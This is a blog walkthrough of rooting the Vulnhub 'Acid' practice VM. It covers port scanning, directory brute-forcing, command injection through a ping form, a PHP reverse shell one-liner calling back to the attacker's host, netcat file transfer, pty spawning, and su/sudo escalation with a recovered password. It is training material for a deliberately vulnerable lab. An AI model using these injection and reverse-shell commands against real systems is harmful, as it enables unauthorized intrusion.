Vulnhub - Acid

Posted on 11 Sep 2015 in security • 6 min read


Since Fart knocker in June I have worked on an other vulnhub machine: darknet. But this one is really hard and get me stuck. I was a bit demotivated to continue vulnhub's machines but I got some time this week, therefore I tried the Acid one.

The goal is as usual, get root on the virtual machine. Let's go:

Host Discovery

As always, we start with host discovery: Nmap and nikto are our friends for this step.


We launch nmap against the virtual machine:

$ nmap -p0-65535 -A -oA nmap
Starting Nmap 6.47 ( ) at 2015-09-08 12:08 CEST
Stats: 0:07:31 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 98.89% done; ETC: 12:15 (0:00:05 remaining)
Nmap scan report for
Host is up (0.0045s latency).
Not shown: 65535 closed ports
33447/tcp open  unknown
|_http-title: /Challenge

Service detection performed. Please report any incorrect results at .

We got a nice Apache web server with a simple splash screen. Notice the page title: /Challenge.


I ran nikto on the target but nothing pop out.

Web exploitation

Page source

As we come pretty empty handed, we check the page source and two interesting things came out:

  • Some hexadecimal code at the end of the page: 0x643239334c6d70775a773d3d
  • the title of the page (we can see it in the nmap scan) is /Challenge and there is an other web page at this address.

Hexa code

We will start with the first lead the hexadecimal code:


We convert it to string and we got:


We decode the base64 and we got:


We go to the url (the /images/ is given with the background image of the first web page):

As a result we got a nice image that reward us for our success.


Yeah it seems to be some troll :)


Let us dig the second lead: the page title. By adding /Challenge in the URL, we land on an authentication interface.

I tried to use SQL injection but nothing. We will try dirbuster with the small dictionary (`/usr/share/dirbuster/directory-list-2.3-small.txt):

DirBuster 1.0-RC1 - Report
Report produced on Tue Sep 08 16:54:05 CEST 2015
Directories found during testing:

Dirs found with a 200 response:


Dirs found with a 403 response:


Files found during testing:

Files found with a 200 responce:


Files found with a 302 responce:



We got the cake.php page but as we all know "The cake is a lie". We noticed that the page title is one more time a folder: /Magic_box. When going to /Challenge/Magic_box we got a 403 forbidden page. Let us fire dirbuster again:

DirBuster 1.0-RC1 - Report
Report produced on Tue Sep 08 17:17:43 CEST 2015
Directories found during testing:

Dirs found with a 403 response:


Files found during testing:

Files found with a 200 responce:


Files found with a 302 responce:



We got some nice result mostly the /command.php page.

Command execution

The page let us ping an other machine in the network. Nevertheless the page name let us think that we can use command exploitation. If we add a ; in the filed and a command it seems to works, for instance with ; ls we got (I use burp for all my pentest, the output of the command is in the response page):


We can also read /etc/passwd: there is two users on the server: acid and saman.

Let us try to get a reverse shell with that.

reverse shell

As always, a good source of information is pentest monkey.

We know the site use php so we will try the php reverse shell first:

  • On the host we execute: nc -l -p 6666
  • On the target (via the ping interface) we query: ; php -r '$sock=fsockopen("",6666);exec("/bin/sh -i <&3 >&3 2>&3");'

It got us a shell on the machine (without tty/pty). But executing the request in the ping interface each time we want the shell in painful, so I extract the curl command from burp:

curl -i -s -k  -X 'POST' \
    -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:40.0) Gecko/20100101 Firefox/40.0' -H 'DNT: 1' -H 'Referer:' -H 'Content-Type: application/x-www-form-urlencoded' \
    -b 'sec_session_id=2cdjrm9k6khpfiilsad1kmnpj2' \
    --data-binary $'IP=%3B+php+-r+%27%24sock%3Dfsockopen%28%22192.168.0.13%22%2C6666%29%3Bexec%28%22%2Fbin%2Fsh+-i+%3C%263+%3E%263+2%3E%263%22%29%3B%27&submit=submit' \

Now that we have a shell, let us see what we can do.

Shell exploitation

First we discover what is at our disposal, mostly in the /home/ (bash_history). In the /home/acid/ there is something interesting but empty:

ls -la /home/acid/.su*
-rw-r--r-- 1 acid acid 0 Jul 31 17:27 /home/acid/.sudo_as_admin_successful

Let us see what else we got on the machine:

$ ls /
$ ls /opt/
$ ls /media
$ ls /s.bin
$ cat /s.bin/investigate.php
echo "Now you have to behave like an investigator to catch the culprit\n";

That is interesting the php file in /s.bin/ clearly tell us to investigate. But what we need know is a privilege escalation ti gain root access.

Privilege escalation

I tried the overlayfs exploit (the same as with Fart knocker) without success:

  • I compiled the exploit on an other 32 bits virtual machine;
  • I transfered it to the shell via netcat;
  • And it failed:

    $ ./ofs.bin : 4: spawning threads mount #1 mount #2 child threads done exploit failed

But we were given an hint.

More investigations

The wiki is always a good source of information. So with more investigation we look at bash_history, search for *txt* files, an so on. Then *pcap* files:

$ find / -name *pcap* 2>/dev/null

Yes /sbin/raw_vs_isi/hint.pcapng!


We transfer the file with netcat:

  • On our attack machine: nc -lp 1234 > pcap
  • On the server: nc 1234 < /sbin/raw_vs_isi/hint.pcapng

We open the pcap file with wireshark. There is a lot of information in this file, over 6 000 trams. On the 6 212 we notice some sort of text. By following the TCP stream (wireshark function) we discover what seems to be a chat exchange:


hello What was the name of the Culprit ???

saman and now a days he's known by the alias of 1337hax0r

oh...Fuck....Great...Now, we gonna Catch Him Soon :D

Yes .. We have to !! The mad bomber is on a rage


Over and Out

Great, what does it means? We know that saman is one of the user on the machine. Maybe we got some hints about it password or something like that.

interactive shell

In order to execute a su, we need a interactive shell (with pty/tty). Once more pentest monkey will help us:

python -c 'import pty; pty.spawn("/bin/sh")'

As /bin/sh is a symlink to dash, we directly use bash:

python -c 'import pty; pty.spawn("/bin/bash")'

We now need to try to connect as saman.


With our beautiful shell we jut have to su saman to try to connect as saman:

www-data@acid:/var/www/html/Challenge/Magic_Box$ su saman
su saman
Password: 1337hax0r

It works! Let us try sudo su:

saman@acid:/var/www/html/Challenge/Magic_Box$ sudo su
sudo su
[sudo] password for saman: 1337hax0r
root@acid:/var/www/html/Challenge/Magic_Box# cat /root/flag.txt
cat /root/flag.txt

Dear Hax0r,

You have successfully completed the challenge.

I  hope you like it.

FLAG NAME: "Acid@Makke@Hax0r


It was a nice box to root but as I read the other write up it seems that my way was not the one expected. Nevertheless, thank to Avinash Kumar Thapa for the box and vulnhub.